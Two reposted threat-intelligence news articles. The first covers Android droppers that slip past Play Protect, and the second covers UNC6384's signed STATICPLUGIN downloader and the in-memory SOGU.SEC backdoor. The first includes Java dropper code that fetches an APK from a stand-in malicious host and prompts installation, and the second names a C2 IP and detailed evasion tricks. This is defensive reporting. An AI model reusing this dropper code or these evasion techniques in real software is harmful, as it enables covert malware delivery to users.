Android droppers have evolved from niche installers for heavyweight banking Trojans into universal delivery frameworks, capable of deploying even rudimentary spyware or SMS stealers.

Initially, droppers served banking malware families that required elevated Accessibility permissions to harvest credentials.

These small applications appeared innocuous at first glance, often masquerading as utility or government apps in high-risk regions. Once installed, they would fetch their true payload, request powerful permissions, and activate their malicious routines.

As defenders strengthened pre-installation scanning, threat actors began rethinking their approach.

In recent months, a surge in dropper-based campaigns targeting Asia—particularly India and Southeast Asia—has emerged. Rather than rely solely on complex RATs or financial Trojans, adversaries now encapsulate simple payloads within dropper shells.

This strategy exploits a critical gap in Google Play Protect’s Pilot Program, which performs a pre-installation permission and API scan but allows installation to proceed if the user confirms.

Threat Fabric analysts noted that this pivot not only circumvents upfront defenses but also future-proofs operations, enabling rapid payload swaps without modifying the dropper itself.

By embedding minimalist stage-one code that carries no high-risk permissions, modern droppers slip through Pilot Program inspections undetected.

Threat Fabric researchers identified variants like RewardDropMiner.B, stripped of its Monero miner and fallback spyware, retaining only the dropper logic to reduce noise and evade detection.

Once the benign “update” prompt is accepted by a user, a concealed routine fetches or decrypts the secondary APK, dynamically requesting RECEIVE_SMS or BIND_NOTIFICATION permissions only upon first launch of the true payload.

The impact of these campaigns is twofold: defenders lose early visibility into malicious activity, and operators maintain a stable foothold capable of delivering arbitrary payloads.

This modularity allows threat actors to react swiftly to security updates or law enforcement takedowns by uploading new payloads behind an unchanged dropper shell hosted on their command-and-control infrastructure.

Infection Mechanism and Evasion Tactics

Delving into the infection mechanism reveals a multi-stage process designed for stealth and resiliency. The dropper’s manifest declares only INTERNET and REQUEST_INSTALL_PACKAGES permissions, avoiding flags in Play Protect’s Pilot scan.

Upon user interaction with the “update” interface, the dropper initiates an HTTPS request to a remote server:-

String payloadUrl = "https://malicious.example.com/payload.apk";
OkHttpClient client = new OkHttpClient();
Request request = new Request.Builder().url(payloadUrl).build();
Response response = client.newCall(request).execute();
if (response.isSuccessful()) {
    File apk = new File(getExternalFilesDir(null), "payload.apk");
    try (FileOutputStream fos = new FileOutputStream(apk)) {
        fos.write(response.body().bytes());
    }
    Intent installIntent = new Intent(Intent.ACTION_VIEW);
    installIntent.setDataAndType(
        FileProvider.getUriForFile(this, getPackageName()+".provider", apk),
        "application/vnd.android.package-archive"
    );
    installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
    startActivity(installIntent);
}

This snippet exemplifies the dropper’s use of standard APIs to download and prompt installation of the payload without triggering high-risk permission alerts.

After installation, the payload’s launcher activity requests RECEIVE_SMS and BIND_NOTIFICATION, at which point Play Protect may warn the user—but often too late, as trust in the initial dropper transfer extends to the newly installed app.

These evasion tactics highlight a pressing need for defenders to correlate pre- and post-install scans and to monitor side-loaded application behavior continuously.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threat Actors Adapting Android Droppers Even to Deploy Simple Malware to Stay Future-Proof appeared first on Cyber Security News.

A stealthy espionage campaign emerged in early 2025 targeting diplomats and government entities in Southeast Asia and beyond.

At the heart of this operation lies STATICPLUGIN, a downloader meticulously disguised as a legitimate Adobe plugin update.

Victims encountered a captive portal hijack that redirected browsers to malicious domains, where an HTTPS-secured landing page prompted users to “Install Missing Plugins…”—a ruse to lower suspicion and bypass browser warnings.

Once executed, the binary deployed a multi-stage chain culminating in the in-memory launch of the SOGU.SEC backdoor.

Following the initial compromise, STATICPLUGIN retrieves an MSI package masquerading as a BMP image. Inside this package resides CANONSTAGER, which is DLL side-loaded to execute the encrypted payload cnmplog.dat.

This side-loading technique exploits trusted Windows components to evade host-based defenses. Google Cloud analysts identified this novel combination of captive portal hijacking and valid code signing as a sophisticated evolution in PRC-nexus tradecraft.

Evidence indicates that Chengdu Nuoxin Times Technology Co., Ltd. issued the signing certificates used for STATICPLUGIN, lending the downloader false legitimacy.

These certificates, issued by GlobalSign and Let’s Encrypt, allowed the malware to bypass many endpoint security solutions that trust digitally signed binaries.

Google Cloud researchers noted that although the original certificate expired on July 14, 2025, UNC6384 likely re-signs subsequent build iterations to maintain uninterrupted stealth.

Detailed analysis of CANONSTAGER reveals unconventional evasion tactics. The launcher resolves Windows API addresses using a custom hashing algorithm and stores them in Thread Local Storage (TLS), an atypical location that may go unnoticed by monitoring tools.

By invoking these functions indirectly through a hidden window procedure and dispatching a WM_SHOWWINDOW message, CANONSTAGER conceals its true control flow within legitimate Windows message queues.

Detection Evasion through In-Memory Execution

One of UNC6384’s most remarkable innovations lies in its end-to-end in-memory execution. After establishing the hidden window and resolving APIs, CANONSTAGER creates a new thread to decrypt cnmplog.dat using a hardcoded 16-byte RC4 key.

Rather than writing the decrypted SOGU.SEC payload to disk, the launcher invokes EnumSystemGeoID as a callback function to execute the backdoor directly in memory.

This technique denies defenders valuable forensic artifacts, as no malicious binary resides on disk.

Moreover, communications with the C2 server at 166.88.2.90 occur over HTTPS, blending with normal web traffic and further complicating network-based detection.

The initial JavaScript triggers the download of AdobePlugins.exe, setting the stage for in-memory execution. By avoiding disk writes and leveraging valid certificates, UNC6384 has raised the bar for malware stealth.

As Google Cloud analysts continue to monitor this campaign, defenders are urged to inspect memory artifacts, enforce strict code-signing policies, and enable Enhanced Safe Browsing to detect anomalous TLS certificates and captive portal hijacks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Chinese UNC6384 Hackers Leverages Valid Code Signing Certificates to Evade Detection appeared first on Cyber Security News.